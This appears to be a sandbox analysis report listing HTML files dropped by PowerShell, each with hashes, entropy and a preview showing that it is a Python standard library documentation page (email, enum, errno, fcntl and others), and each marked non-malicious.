                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (741), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34090
                                                                                                                                                                                                              Entropy (8bit):4.838377473371882
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:IAaqyEklMLhoe3NEPeDtMNFiplYEutHnxME762/:Oqy/MLwFpZtRME762/
                                                                                                                                                                                                              MD5:D52F5C92B33AFF384CA9FD633873E51C
                                                                                                                                                                                                              SHA1:AA8F59EE52AE30EFDDD1489E3839ED0345CB2AD9
                                                                                                                                                                                                              SHA-256:C2B9FA412F9496E844783BFD7FE5F9A3B6D891CEC14647382C9F1F0247144C55
                                                                                                                                                                                                              SHA-512:F3ECA6B3FBAC95CC260723C004F5AD924BA4C580F21B1D689E396E0584DC3DE21E2F61F64EFC8AB4194F78A268A3B37A74BAFEF1D71A1AE5B12240AA6F24504D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email . An email and MIME handling package" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/__init__.py The email package is a library for managing email messages. It is specifically not designed to do any sending of email messages to SMTP ( RFC 2821), NNTP, or othe..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/__init__.py The
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (993), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21494
                                                                                                                                                                                                              Entropy (8bit):4.841556003865485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:xGxHqklQCxnuTMRbQhXlyYKkX2yEpyFX9XVyFRyLRyYEnPPn8TM576zqWTC:MqyQEEMRkhXlyYKkX2yEpyFX9XVyFRyK
                                                                                                                                                                                                              MD5:02FCA56A81D6FBFA120F617F21AA8D49
                                                                                                                                                                                                              SHA1:A8597D5BABA6A4A4B388E58BCFED0A4CB9B713A0
                                                                                                                                                                                                              SHA-256:91D4D1871898B19389E0D51447E6F3AD16940F4A8FF940D21209F874A384615B
                                                                                                                                                                                                              SHA-512:06A9197E99D443B9E90C5B97B807E7AF990833F441ACDD436015129D0F179B9D7888AB4DA5F94EDFFF8D1E782B81F54A349392D07348B66A81E032339C50C529
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.iterators: Iterators" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.iterators.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/iterators.py Iterating over a message object tree is fairly easy with the Message.walk method. The email.iterators module provides some useful higher level iterations over me..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/iterators.py Iterating
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1402), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):105998
                                                                                                                                                                                                              Entropy (8bit):4.794500941986105
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:mqyGMikIAOyWe2yYJyFFyFi22yYFyFgRlm25iQXbPobLbU+sbQGovzbCyFebCyFM:qTxEtFSPDXtA
                                                                                                                                                                                                              MD5:C45189C98A9172E022265AA72BFF0920
                                                                                                                                                                                                              SHA1:173B1173DF61BDD65A043945E44E4184D6BA27CD
                                                                                                                                                                                                              SHA-256:CE5F6EEC028F59C40FF4F014529E6E5DC5DE8E38FC69FD97AB4035C37654CBB6
                                                                                                                                                                                                              SHA-512:923F0921C821CFB009A312556B06D6AA05D0806460B43043F8E12407F4DA324060BDFB52847A17B7631809973523FD729BB1A183F987FC9F93080D006388C0DE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.message: Representing an email message" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.message.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/message.py The central class in the email package is the EmailMessage class, imported from the email.message module. It is the base class for the email object model. EmailMes..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/message
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1429), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):49529
                                                                                                                                                                                                              Entropy (8bit):4.839459862315908
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uqynMW+ieWwFyEojIW+YvRyqpyFSyFwFyEojwiRrWyHAyOwFyEojsCNNWyFAyOwS:MA
                                                                                                                                                                                                              MD5:2CD00278C160D5F2C3048251326B7A81
                                                                                                                                                                                                              SHA1:C40AF6CCE3E956B4D457AB80133DEA29A992794E
                                                                                                                                                                                                              SHA-256:5FCFA3123352EE72EE3B24260457891D47422A576C81F16378F37E5D992E2D6A
                                                                                                                                                                                                              SHA-512:19E33B11D4FCB411F298F32B5FBE3A325755374DC4470806B87D7A5BBF8516BBDD132D784AF3759C10ABD2171C013D17F0C55F6460A0BC211051E86674B5E9AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.mime: Creating email and MIME objects from scratch" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.mime.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/mime/ This module is part of the legacy ( Compat32) email API. Its functionality is partially replaced by the contentmanager in the new API, but in certain applications these..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/emai
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (892), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):61946
                                                                                                                                                                                                              Entropy (8bit):4.7958137357650505
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:/qymMt9K7ZvNyFwFyo3kIrHQNyFwFyoXPPryFwFyo2C7yYNJ7yY2Iv2ryFwFyo3R:PK7ZakIBlNLA
                                                                                                                                                                                                              MD5:ADB014E0F369BBAF51B74727A0C0859D
                                                                                                                                                                                                              SHA1:17808FFE39066CFE2EC567C6B2013E2F9225CD52
                                                                                                                                                                                                              SHA-256:1344B5B0740273FA5170E5B56D8EFE7DAE9D3958C1AFF6BC648C78778DB336FA
                                                                                                                                                                                                              SHA-512:671B7187A151D84301AC60D7B829FF18B7D729618F6D80BFB3554AF4DBB74A1DA5E8AACB01730879C6B12785628FE4CD726FC3297939E9AB5BBA946F60001BA9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.parser: Parsing email messages" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.parser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/parser.py Message object structures can be created in one of two ways: they can be created from whole cloth by creating an EmailMessage object, adding headers using the dicti..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/parser.py Messag
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (622), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):87835
                                                                                                                                                                                                              Entropy (8bit):4.820363310999101
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:aqy3MJLPdn6+VjgTq2HZobfjg43GU3GxbMK7bO2bOwbOIbOGhjgXkj9OKyb7GK+P:N2qN4pEA
                                                                                                                                                                                                              MD5:FE4344B0754FD87E868C2936C33587A1
                                                                                                                                                                                                              SHA1:A3AD2232278F43F7F2EA2D8C84A759EF1145286D
                                                                                                                                                                                                              SHA-256:CC8E1B9DF55E303949483AF28E6A16768D31D7D9D5976A0BC4E7B717E069232D
                                                                                                                                                                                                              SHA-512:944EA6138BDFE29CA5A609564143FFD1088F5387DE930A38AF5B4AC119B43AA6AE6483D181DFC95B317A07F18093812C46339D0D1794E5CC21FB6F98936A4076
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.policy: Policy Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.policy.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/policy.py The email package.s prime focus is the handling of email messages as described by the various email and MIME RFCs. However, the general format of email messages (a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/policy.py The email pa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (909), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):45315
                                                                                                                                                                                                              Entropy (8bit):4.82541565086828
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:1qyN8JMAIhEyFC2FoyFXyFXTyfN8+NHzSZfw/ybLv/0MzlxMQM+ZpQTIQQgP4BZy:1qygMAIhEyFCioyFXyFjyfN8+NHzSZfY
                                                                                                                                                                                                              MD5:FFAEC0D97C57A18CD7C95DF0F185460F
                                                                                                                                                                                                              SHA1:3106A7E11A3B7E26986C061C15E712F003AE7615
                                                                                                                                                                                                              SHA-256:87DC7BB3D59AEB917748B3BFECEA925EC1F647F7EA8164872F662E22EB51D77F
                                                                                                                                                                                                              SHA-512:4F6C5B2D7F76838A1FA201010C9132AAC2B79A87366A5E9EAFDEB883A32CB3230E9C5E814619EE2FFD31BCEC1D148F494777BB96E887DECE20B3630DDF90D6F8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.utils: Miscellaneous utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.utils.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/utils.py There are a couple of useful utilities provided in the email.utils module: The remaining functions are part of the legacy ( Compat32) email API. There is no need to ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/utils.py There ar
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1495), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27788
                                                                                                                                                                                                              Entropy (8bit):4.814463604104569
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:bqyo3QzM37nJovMTthAt6g5wpQP/QJcyFLyYoyY1yYEyYGyL5a33XMW/762/:bqyPMbRTIQUPoJcyFLyYoyY1yYEyYGys
                                                                                                                                                                                                              MD5:FBAE31220963082B2347DCA720C0F57B
                                                                                                                                                                                                              SHA1:23EDBCB805CD36EA4ECA57F30032EF6497FB6AAC
                                                                                                                                                                                                              SHA-256:8BFE03C8730FF99A2CA4B2DCBA3A9D6FEE92F484ED6C1FE6F1B812BD4A5251D7
                                                                                                                                                                                                              SHA-512:EFD4A04BE98FB504DC9E9507C8E31982D491C3F0899ADE59C3AC7835CD9FCBAF4E34E1C36D212F1BB073FC4D7DEF82A861F9C7F28670AC273133F5657E628623
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="ensurepip . Bootstrapping the pip installer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/ensurepip.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/ensurepip The ensurepip package provides support for bootstrapping the pip installer into an existing Python installation or virtual environment. This bootstrapping approach reflec..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/ensurepip The en
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (995), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):125885
                                                                                                                                                                                                              Entropy (8bit):4.861605021567684
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xqyjM7o8+ejdKOSRCmGd0MSSKdQQKd6KsJ/K7BKoZKBvm+vamuzulsbLMkPrwKou:itSgnwDA
                                                                                                                                                                                                              MD5:91C7F2A02087B40012C25B26A81B8BA5
                                                                                                                                                                                                              SHA1:4E85170709ED424EF117E902732DA1D2A484838A
                                                                                                                                                                                                              SHA-256:A42E67331022285C687FB99BB92E72837DD333C38EC85EFA7D42B47131763A20
                                                                                                                                                                                                              SHA-512:F5B65981AEAF1105D6659BAC0B39A14758FF8948DE68A5098D4F3DDA418D8ED93DCB973E053D4C3928FE0A8767567B9BECAF17914C1C838FAEFB0968E1A0E595
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="enum . Support for enumerations" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/enum.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/enum.py Important: This page contains the API reference information. For tutorial information and discussion of more advanced topics, see Basic Tutorial, Advanced Tutorial, Enum Co..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/enum.py Important: This page cont
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67828
                                                                                                                                                                                                              Entropy (8bit):4.9665861892788765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:hqytMukM+uK+m41Dkie8cj6a7KwoC8a+bVS6IexIAt5HBUVEmV2ozKKvGMUCLgv2:u3xSPA
                                                                                                                                                                                                              MD5:103FA7AD2B4D1FD18BC443FBFFFF96B7
                                                                                                                                                                                                              SHA1:A95EA4F96E3D2153ABF7FAE684E9EFD31DB3D088
                                                                                                                                                                                                              SHA-256:A3C34DF00CF746D1B5ECE1B6C7A6008838ABCBD56DA1BCE0B7C7827D4141094E
                                                                                                                                                                                                              SHA-512:1DBD457D0940308E0580A6F59848DC702BD8DA086A4AC0AC6D690856080E4185B9C73EB26F70479F9B6F56CDBD8CB83BC51AF8145A5384889838390991F0EBEA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="errno . Standard errno system symbols" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/errno.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module makes available standard errno system symbols. The value of each symbol is the corresponding integer value. The names and descriptions are borrowed from linux/include/errno.h, which sho..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module makes available standard errno
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (831), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):138496
                                                                                                                                                                                                              Entropy (8bit):4.867420354279112
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:7qycM/c400wl9j2odK+O6sbNHWn5fjqkeMXcmjx3VNAOkRJL8lOq0ZwvuVuyorx0:c4mAgO/mDLd1FT03uuBPhSA
                                                                                                                                                                                                              MD5:EDA2F7008B8CBEF7312868F256907586
                                                                                                                                                                                                              SHA1:87AD6F1DD4F0F0387D2169F74B8101D9D2F56975
                                                                                                                                                                                                              SHA-256:29DD406F5F2EF94A5D61A3D06704F952A284D02079547C67F07766A0632C2712
                                                                                                                                                                                                              SHA-512:12E3600A4D664581B09037597F031C0D34D429C5D51DC21FF2D14D58ABF83007EE1265BDDCF287454EA3E624179D3AD2DEA5109E6664694C735A580C5B377FE1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Built-in Exceptions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/exceptions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="In Python, all exceptions must be instances of a class that derives from BaseException. In a try statement with an except clause that mentions a particular class, that clause also handles any excep..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="In Python, all exceptions must be instances of a class tha
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1013), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35332
                                                                                                                                                                                                              Entropy (8bit):4.880882214165861
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:u9qy8x6b3M7GfwgayeSyTskayeSyTf5bvRE5tAyYlyeLyYsSey6O3lyeSyTiyYD8:CqybMAwgayeSyTskayeSyTRbvRE5tAyo
                                                                                                                                                                                                              MD5:13FEE9124661BECB5531F436DF3BE8E9
                                                                                                                                                                                                              SHA1:208D18C87009862290557A4B3FB9C882BBB2AF63
                                                                                                                                                                                                              SHA-256:97B4072D4BB5F64E3278A93546A84137C47939C01811766E1605F81B0DF7089B
                                                                                                                                                                                                              SHA-512:B1A39E490A9D0CD6C2BE4523ADF9A98DC029FCF1E64B718987E6F135AB447BE014357CB17DE6398C51640202AB8BF485662F26CA812254DA66FDD75D2783F13B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="faulthandler . Dump the Python traceback" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/faulthandler.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module contains functions to dump Python tracebacks explicitly, on a fault, after a timeout, or on a user signal. Call faulthandler.enable() to install fault handlers for the SIGSEGV, SIGFPE, ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module contains functions to
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1027), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41909
                                                                                                                                                                                                              Entropy (8bit):4.862629513974276
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:tqydI7Mv7EmrTyLppZ2mSTyLmyTqC4WmKikmrsyLLyL7yL1spP/Mr762/:tqyeMv7EmrTyLR2mSTyLmyTV4WmKikmX
                                                                                                                                                                                                              MD5:FDE4CD39D11455DA3D2A701CFD55D01E
                                                                                                                                                                                                              SHA1:886E8639ECD36641BA32DDF7A981F13CE97A66B1
                                                                                                                                                                                                              SHA-256:F1ED977A38D6B22987575176E4418F7EF8F045C56F1AA032E24B529430930227
                                                                                                                                                                                                              SHA-512:7D0DFA38BDAE4C8B5213053D9DE42C564F1BAC97C120D9604AEF7C1E142E2E6380FC23BBEE9517A026FB90BE8597AA5EA53936582E4085B1A0CFAABFBEC89EAE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="fcntl . The fcntl and ioctl system calls" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/fcntl.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module performs file control and I/O control on file descriptors. It is an interface to the fcntl() and ioctl() Unix routines. For a complete description of these calls, see fcntl(2) and ioctl..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module performs file control and I/
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (925), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35910
                                                                                                                                                                                                              Entropy (8bit):4.857310904855984
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:iqyYZkMgNftrHyTakmE+HyTzXZuxh1yFDyFXlOIXFJViW6dSgGVZ+Wie0yMr762/:iqyLMgNftrHyTakmE+HyTzXZuxh1yFDH
                                                                                                                                                                                                              MD5:176AF92EC5982F27964F90FCE0EF8355
                                                                                                                                                                                                              SHA1:A4ADDC7C3AA7886F60DF0DF48FBDE0926542FEAA
                                                                                                                                                                                                              SHA-256:0F778D36A7AEB51359757E038291E51810249F364B91FC557ED5DC598FF9660D
                                                                                                                                                                                                              SHA-512:1CA09FF54B4A23F3B80D8BABB9A9FBDFCD8FB40B8197001CEC519AB7387D2F2172B4A9C4C11266492A9EDE2C9EB06B0C1FB3B6812FC0AA1405BC800B938084B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="filecmp . File and Directory Comparisons" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/filecmp.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/filecmp.py The filecmp module defines functions to compare files and directories, with various optional time/correctness trade-offs. For comparing files, see also the difflib modul..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/filecmp.py The filecm
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17082
                                                                                                                                                                                                              Entropy (8bit):4.864552970270791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:cYXHXiPHqklUBf1nKTMyGMFXlucBabnoTMo76zqWTC:cYXHXiPqyUBNoMyGMFXlucBUGMo762/
                                                                                                                                                                                                              MD5:92598D5EAB823903B88310519AC7DEB7
                                                                                                                                                                                                              SHA1:A144FC9BA292E26651D6EA1F7C4DC7DC78387247
                                                                                                                                                                                                              SHA-256:9AE0AADECFFC0FDC9F806C4128E242FD9539DC36DC9CEACE85EC995BD2903871
                                                                                                                                                                                                              SHA-512:4C39A0768A00F86D59CD624B88E842EB3D0D4A77F77AB9408088BD40DA691399688BDC9F7633BC6D98BB5F56482ACE3A5891D2EC979329E81A142F2055CD5CF5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="File Formats" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/fileformats.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter parse various miscellaneous file formats that aren.t markup languages and are not related to e-mail. csv . CSV File Reading and Writing- Module Contents, Diale..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter parse various miscella
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1839), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43979
                                                                                                                                                                                                              Entropy (8bit):4.809194552260166
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:ZDnDmqyAmvM4erYntyFFyYFylwMyVoyFWyF4yFgIlyJWdi2gYrV3mVNkzSfAo5tu:ZDnDmqyhM4erYntyFFyYFylwMyVoyFWY
                                                                                                                                                                                                              MD5:1D42484149521F4EC84CAAC270ADC562
                                                                                                                                                                                                              SHA1:6056A4ED48D495A84F9313CD842A3C68133D2F41
                                                                                                                                                                                                              SHA-256:3DA6097BBDA4762A5141A0CE5DCD55F1D2B9DEB00DEEB8FB18ABAD3E8233D5FE
                                                                                                                                                                                                              SHA-512:2D4D0801B70CDAE5C23D4F3651E4092682B514CFF81A6C43081A043CAE9743DDBF49EC6A3F9CA85C6682D51886A465F022EA6C707765DDB6C3F717369B0423F8
                                                                                                                                                                                                              Malicious:false
